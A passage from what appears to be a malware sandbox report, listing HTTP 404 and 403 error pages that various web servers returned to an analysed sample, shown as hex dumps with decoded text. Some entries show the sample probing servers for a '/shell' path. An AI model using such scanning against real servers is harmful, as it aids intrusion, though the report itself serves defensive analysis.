61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 01 Nov 2021 11:16:58 GMTServer: DNVRS-WebsCache-Control: no-cacheContent-Length: 166Content-Type: text/htmlConnection: keep-aliveKeep-Alive: timeout=60, max=99Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6f 70 65 6e 20 55 52 4c 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open URL</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1566Date: Mon, 01 Nov 2021 09:09:54 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 01 Nov 2021 09:09:54 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: Mbedthis-Appweb/2.4.2Date: Mon, 01 Nov 2021 09:09:40 GMTConnection: keep-aliveKeep-Alive: timeout=60, max=2000Content-Type: text/htmlContent-length: 126Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 48 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 48 32 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a 0d 0a Data Ascii: <HTML><HEAD><TITLE>Document Error: Not Found</TITLE></HEAD><BODY><H2>Access Error: 404 -- Not Found</H2></BODY></HTML>
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Mon, 01 Nov 2021 09:09:55 GMTServer: ApacheContent-Length: 207Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 2f 73 68 65 6c 6c 0a 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access /shellon this server.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 01 Nov 2021 09:09:50 GMTServer: ApacheX-Frame-Options: SAMEORIGINContent-Length: 196Keep-Alive: timeout=15, max=200Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/10.0Date: Mon, 01 Nov 2021 09:09:57 GMTContent-Length: 1245Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 68 65 61 64 65 72 22 3e 3c 68 31 3e 53 65 72 76 65 72 20 45 72 72 6f 7
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 01 Nov 2021 10:00:14 GMTServer: webCache-Control: no-cacheContent-Length: 166Content-Type: text/htmlConnection: keep-aliveKeep-Alive: timeout=60, max=99Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6f 70 65 6e 20 55 52 4c 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open URL</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 01 Nov 2021 09:09:57 GMTServer: ApacheAccept-Ranges: bytesCache-Control: no-cache, no-store, must-revalidatePragma: no-cacheExpires: 0Keep-Alive: timeout=5, max=100Connection: Keep-AliveTransfer-Encoding: chunkedContent-Type: text/htmlData Raw: 31 0d 0a 0a 0d 0a 31 0d 0a 0a 0d 0a 31 0d 0a 0a 0d 0a 31 35 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 0d 0a 33 0d 0a 34 30 34 0d 0a 31 0d 0a 20 0d 0a 39 0d 0a 4e 6f 74 20 46 6f 75 6e 64 0d 0a 31 66 63 61 0d 0a 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 32 38 35 37 31 34 32 39 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 32 46 33 32 33 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 73 65 63 74 69 6f 6e 2c 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 01 Nov 2021 04:09:57 GMTServer: WebsX-Frame-Options: SAMEORIGINCache-Control: no-cacheContent-Length: 166Content-Type: text/htmlConnection: keep-aliveKeep-Alive: timeout=60, max=99Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6f 70 65 6e 20 55 52 4c 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open URL</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/8.5X-Powered-By: ASP.NETDate: Mon, 01 Nov 2021 09:10:30 GMTContent-Length: 1163Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 67 62 32 33 31 32 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 d5 d2 b2 bb b5 bd ce c4 bc fe bb f2 c4 bf c2 bc a1 a3 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=gb2312"/><title>404 - </title><style type="text/css"><!--body{margin:0;font-size:.7em;font-family:Verdana, Arial,
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlContent-Length: 345Date: Fri, 07 Aug 2020 21:28:23 GMTServer: lighttpd/1.4.39Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 69 73 6f 2d 38 38 35 39 2d 31 22 3f 3e 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 3e 0a 20 20 3c 68 31 3e 34 30 34 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <?xml version="1.0" encoding="iso-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>404 - Not Found</title> </head> <body> <h1>404 - Not Found</h1> </body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 01 Nov 2021 09:10:02 GMTServer: Apache/2.2.31 (CentOS)Content-Length: 278Keep-Alive: timeout=10Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 73 68 65 6c 6c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 32 2e 33 31 20 28 43 65 6e 74 4f 53 29 20 53 65 72 76 65 72 20 61 74 20 31 32 37 2e 30 2e 30 2e 31 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /shell was not found on this server.</p><hr><address>Apache/2.2.31 (CentOS) Server at 127.0.0.1 Port 80</address></body></html>
